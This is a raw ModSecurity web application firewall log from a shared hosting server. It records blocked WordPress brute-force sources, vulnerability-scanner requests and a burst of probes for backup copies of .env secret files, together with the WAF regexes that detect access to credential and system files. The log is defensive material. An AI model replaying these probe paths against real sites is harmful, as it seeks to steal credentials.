[Tue May 26 13:17:47.163344 2026] [security2:error] [pid 501489:tid 501745] [client 45.148.10.204:45700] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.soft.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVQI2kFNZ9cRlz80IjVCgAAAP4"]
[Tue May 26 13:17:47.170888 2026] [security2:error] [pid 501489:tid 501746] [client 45.148.10.204:45728] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.soft.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVQI2kFNZ9cRlz80IjVCwAAAP8"]
[Tue May 26 13:17:47.173586 2026] [security2:error] [pid 501489:tid 501719] [client 45.148.10.204:45708] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.soft.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVQI2kFNZ9cRlz80IjVDAAAAOg"]
[Tue May 26 13:17:47.229044 2026] [security2:error] [pid 501489:tid 501680] [client 45.148.10.204:45736] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.soft.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVQI2kFNZ9cRlz80IjVDgAAAME"]
[Tue May 26 13:17:47.253183 2026] [security2:error] [pid 501489:tid 501725] [client 45.148.10.204:45744] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.soft.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVQI2kFNZ9cRlz80IjVDwAAAO0"]
[Tue May 26 13:17:47.257478 2026] [security2:error] [pid 501489:tid 501681] [client 45.148.10.204:51816] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.soft.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVQI2kFNZ9cRlz80IjVEAAAAMI"]
[Tue May 26 13:17:47.275057 2026] [security2:error] [pid 501489:tid 501701] [client 45.148.10.204:51818] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.soft.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVQI2kFNZ9cRlz80IjVEwAAANY"]
[Tue May 26 13:17:47.276670 2026] [security2:error] [pid 501489:tid 501691] [client 45.148.10.204:51824] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.soft.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVQI2kFNZ9cRlz80IjVEgAAAMw"]
[Tue May 26 13:17:47.302655 2026] [security2:error] [pid 501489:tid 501700] [client 45.148.10.204:51834] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.soft.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVQI2kFNZ9cRlz80IjVFgAAANU"]
[Tue May 26 13:17:47.307371 2026] [security2:error] [pid 501489:tid 501644] [client 45.148.10.204:51832] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.soft.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVQI2kFNZ9cRlz80IjVFwAAAJ4"]
[Tue May 26 13:17:47.381164 2026] [security2:error] [pid 501489:tid 501683] [client 45.148.10.204:51866] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.soft.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVQI2kFNZ9cRlz80IjVGAAAAMQ"]
[Tue May 26 13:17:47.395449 2026] [security2:error] [pid 501489:tid 501620] [client 45.148.10.204:51850] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.soft.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVQI2kFNZ9cRlz80IjVGQAAAIY"]
[Tue May 26 13:17:47.397114 2026] [security2:error] [pid 501489:tid 501672] [client 45.148.10.204:51874] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.soft.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVQI2kFNZ9cRlz80IjVGgAAALk"]
[Tue May 26 13:17:47.400717 2026] [security2:error] [pid 501489:tid 501724] [client 45.148.10.204:51878] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.soft.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVQI2kFNZ9cRlz80IjVGwAAAOw"]
[Tue May 26 13:17:47.690187 2026] [security2:error] [pid 501489:tid 501669] [client 45.148.10.204:51890] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.soft.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVQI2kFNZ9cRlz80IjVKQAAALY"]
[Tue May 26 13:17:47.807347 2026] [security2:error] [pid 501489:tid 501646] [client 103.101.90.175:53747] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVQI2kFNZ9cRlz80IjVDQAAAJ8"], referer: https://www.cagmedya.com/gizlilik-ve-guvenlik-politikasi/
[Tue May 26 13:17:47.841263 2026] [security2:error] [pid 501489:tid 501735] [client 45.148.10.204:51904] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.soft.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVQI2kFNZ9cRlz80IjVMAAAAPU"]
[Tue May 26 13:17:48.032262 2026] [security2:error] [pid 501489:tid 501688] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQI2kFNZ9cRlz80IjVJQAAAMk"]
[Tue May 26 13:17:50.600689 2026] [security2:error] [pid 501489:tid 501749] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQJmkFNZ9cRlz80IjVaQAAAQI"]
[Tue May 26 13:17:51.371378 2026] [security2:error] [pid 501489:tid 501572] [remote 216.185.214.209:35992] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.214.185.216.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahVQJ2kFNZ9cRlz80IjVgwAAt1I"]
[Tue May 26 13:17:52.136508 2026] [security2:error] [pid 501489:tid 501697] [client 74.7.175.141:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "agsnails.com.thedebateafrica.org"] [uri "/index.php"] [unique_id "ahVQJmkFNZ9cRlz80IjVcwAAANI"]
[Tue May 26 13:17:52.207857 2026] [security2:error] [pid 501489:tid 501622] [client 74.7.175.141:37674] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "agsnails.com.thedebateafrica.org"] [uri "/robots.txt"] [unique_id "ahVQJmkFNZ9cRlz80IjVcQAAiGE"]
[Tue May 26 13:17:52.296294 2026] [security2:error] [pid 501489:tid 501629] [client 31.57.184.107:62263] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "abrindoempresacurso.contabilidadecarioca.com.br"] [uri "/wp-login.php"] [unique_id "ahVQKGkFNZ9cRlz80IjVmgAAAI8"], referer: https://www.google.com/search?q=wordpress
[Tue May 26 13:17:52.655918 2026] [security2:error] [pid 501489:tid 501750] [client 4.201.75.230:33889] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/bb.php"] [unique_id "ahVQKGkFNZ9cRlz80IjVqgAAAQM"]
[Tue May 26 13:17:53.160752 2026] [security2:error] [pid 501489:tid 501643] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQKGkFNZ9cRlz80IjVrgAAAJ0"]
[Tue May 26 13:17:53.962448 2026] [security2:error] [pid 501489:tid 501655] [client 4.201.75.230:33866] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/222.php"] [unique_id "ahVQKWkFNZ9cRlz80IjV3AAAAKg"]
[Tue May 26 13:17:55.272004 2026] [security2:error] [pid 501489:tid 501657] [client 142.248.80.176:19788] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpanel.operatives.org.in"] [uri "/___proxy_subdomain_cpanel/.env.production.copy"] [unique_id "ahVQK2kFNZ9cRlz80IjV_wAAAKo"]
[Tue May 26 13:17:55.352861 2026] [security2:error] [pid 501489:tid 501640] [client 4.201.75.230:33864] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/test1.php"] [unique_id "ahVQK2kFNZ9cRlz80IjWAAAAAJo"]
[Tue May 26 13:17:55.468519 2026] [security2:error] [pid 501489:tid 501643] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQK2kFNZ9cRlz80IjV_gAAAJ0"]
[Tue May 26 13:17:56.272576 2026] [security2:error] [pid 501489:tid 501671] [client 142.248.80.176:64704] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpanel.operatives.org.in"] [uri "/___proxy_subdomain_cpanel/.env.bak"] [unique_id "ahVQLGkFNZ9cRlz80IjWHgAAALg"]
[Tue May 26 13:17:56.273319 2026] [security2:error] [pid 501489:tid 501669] [client 142.248.80.176:64672] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpanel.operatives.org.in"] [uri "/___proxy_subdomain_cpanel/.env.old"] [unique_id "ahVQLGkFNZ9cRlz80IjWIQAAALY"]
[Tue May 26 13:17:56.459853 2026] [security2:error] [pid 501489:tid 501718] [client 142.248.80.176:64880] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpanel.operatives.org.in"] [uri "/___proxy_subdomain_cpanel/.env.production.orig"] [unique_id "ahVQLGkFNZ9cRlz80IjWLQAAAOc"]
[Tue May 26 13:17:56.460331 2026] [security2:error] [pid 501489:tid 501658] [client 142.248.80.176:64866] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpanel.operatives.org.in"] [uri "/___proxy_subdomain_cpanel/.env.production.backup"] [unique_id "ahVQLGkFNZ9cRlz80IjWKwAAAKs"]
[Tue May 26 13:17:56.460353 2026] [security2:error] [pid 501489:tid 501625] [client 142.248.80.176:64842] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpanel.operatives.org.in"] [uri "/___proxy_subdomain_cpanel/.env.production.bak"] [unique_id "ahVQLGkFNZ9cRlz80IjWMQAAAIs"]
[Tue May 26 13:17:56.460944 2026] [security2:error] [pid 501489:tid 501666] [client 142.248.80.176:64876] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpanel.operatives.org.in"] [uri "/___proxy_subdomain_cpanel/.env.production.swp"] [unique_id "ahVQLGkFNZ9cRlz80IjWLgAAALM"]
[Tue May 26 13:17:56.461102 2026] [security2:error] [pid 501489:tid 501667] [client 142.248.80.176:64804] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpanel.operatives.org.in"] [uri "/___proxy_subdomain_cpanel/.env.local.swp"] [unique_id "ahVQLGkFNZ9cRlz80IjWMwAAALQ"]
[Tue May 26 13:17:56.461299 2026] [security2:error] [pid 501489:tid 501624] [client 142.248.80.176:64870] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpanel.operatives.org.in"] [uri "/___proxy_subdomain_cpanel/.env.production~"] [unique_id "ahVQLGkFNZ9cRlz80IjWLwAAAIo"]
[Tue May 26 13:17:56.461402 2026] [security2:error] [pid 501489:tid 501653] [client 142.248.80.176:64826] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpanel.operatives.org.in"] [uri "/___proxy_subdomain_cpanel/.env.local.copy"] [unique_id "ahVQLGkFNZ9cRlz80IjWMgAAAKY"]
[Tue May 26 13:17:56.461449 2026] [security2:error] [pid 501489:tid 501635] [client 142.248.80.176:64854] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpanel.operatives.org.in"] [uri "/___proxy_subdomain_cpanel/.env.production.old"] [unique_id "ahVQLGkFNZ9cRlz80IjWMAAAAJU"]
[Tue May 26 13:17:56.461834 2026] [security2:error] [pid 501489:tid 501621] [client 142.248.80.176:64770] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpanel.operatives.org.in"] [uri "/___proxy_subdomain_cpanel/.env.local.bak"] [unique_id "ahVQLGkFNZ9cRlz80IjWNQAAAIc"]
[Tue May 26 13:17:56.461871 2026] [security2:error] [pid 501489:tid 501659] [client 142.248.80.176:64796] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpanel.operatives.org.in"] [uri "/___proxy_subdomain_cpanel/.env.local~"] [unique_id "ahVQLGkFNZ9cRlz80IjWNAAAAKw"]
[Tue May 26 13:17:56.462026 2026] [security2:error] [pid 501489:tid 501685] [client 142.248.80.176:64816] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpanel.operatives.org.in"] [uri "/___proxy_subdomain_cpanel/.env.local.orig"] [unique_id "ahVQLGkFNZ9cRlz80IjWNwAAAMY"]
[Tue May 26 13:17:56.462535 2026] [security2:error] [pid 501489:tid 501663] [client 142.248.80.176:64714] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpanel.operatives.org.in"] [uri "/___proxy_subdomain_cpanel/.env.backup"] [unique_id "ahVQLGkFNZ9cRlz80IjWOQAAALA"]
[Tue May 26 13:17:56.462992 2026] [security2:error] [pid 501489:tid 501687] [client 142.248.80.176:64780] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpanel.operatives.org.in"] [uri "/___proxy_subdomain_cpanel/.env.local.backup"] [unique_id "ahVQLGkFNZ9cRlz80IjWOwAAAMg"]
[Tue May 26 13:17:56.463218 2026] [security2:error] [pid 501489:tid 501632] [client 142.248.80.176:64708] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpanel.operatives.org.in"] [uri "/___proxy_subdomain_cpanel/.env.local.old"] [unique_id "ahVQLGkFNZ9cRlz80IjWPQAAAJI"]
[Tue May 26 13:17:56.463294 2026] [security2:error] [pid 501489:tid 501745] [client 142.248.80.176:64736] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpanel.operatives.org.in"] [uri "/___proxy_subdomain_cpanel/.env~"] [unique_id "ahVQLGkFNZ9cRlz80IjWPAAAAP4"]
[Tue May 26 13:17:56.464280 2026] [security2:error] [pid 501489:tid 501720] [client 142.248.80.176:64760] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpanel.operatives.org.in"] [uri "/___proxy_subdomain_cpanel/.env.copy"] [unique_id "ahVQLGkFNZ9cRlz80IjWOgAAAOk"]
[Tue May 26 13:17:56.464607 2026] [security2:error] [pid 501489:tid 501630] [client 142.248.80.176:64746] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpanel.operatives.org.in"] [uri "/___proxy_subdomain_cpanel/.env.orig"] [unique_id "ahVQLGkFNZ9cRlz80IjWPwAAAJA"]
[Tue May 26 13:17:56.464832 2026] [security2:error] [pid 501489:tid 501705] [client 142.248.80.176:64744] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpanel.operatives.org.in"] [uri "/___proxy_subdomain_cpanel/.env.swp"] [unique_id "ahVQLGkFNZ9cRlz80IjWPgAAANo"]
[Tue May 26 13:17:56.990841 2026] [security2:error] [pid 501489:tid 501650] [client 4.201.75.230:33865] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/css/autoload_classmap.php"] [unique_id "ahVQLGkFNZ9cRlz80IjWUQAAAKM"]
[Tue May 26 13:17:57.475251 2026] [security2:error] [pid 501489:tid 501490] [remote 121.200.216.55:37630] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/wp-login.php"] [unique_id "ahVQLWkFNZ9cRlz80IjWWwAAwQA"]
[Tue May 26 13:17:57.844738 2026] [security2:error] [pid 501489:tid 501729] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQLWkFNZ9cRlz80IjWYQAAAPA"]
[Tue May 26 13:17:59.698385 2026] [security2:error] [pid 501489:tid 501648] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQL2kFNZ9cRlz80IjWlAAAAKE"]
[Tue May 26 13:18:00.724847 2026] [security2:error] [pid 501489:tid 501494] [remote 31.24.44.107:36258] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.44.24.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahVQMGkFNZ9cRlz80IjWrwAAxQQ"]
[Tue May 26 13:18:02.254694 2026] [security2:error] [pid 501489:tid 501628] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQMWkFNZ9cRlz80IjW0gAAAI4"]
[Tue May 26 13:18:02.735663 2026] [security2:error] [pid 501489:tid 501720] [client 176.65.139.237:30792] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.cariocabpo.contabilidadecarioca.com.br"] [uri "/.env"] [unique_id "ahVQMmkFNZ9cRlz80IjW7QAAAOk"]
[Tue May 26 13:18:02.812662 2026] [security2:error] [pid 501489:tid 501643] [client 4.201.75.230:33879] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/fx.php"] [unique_id "ahVQMmkFNZ9cRlz80IjW7gAAAJ0"]
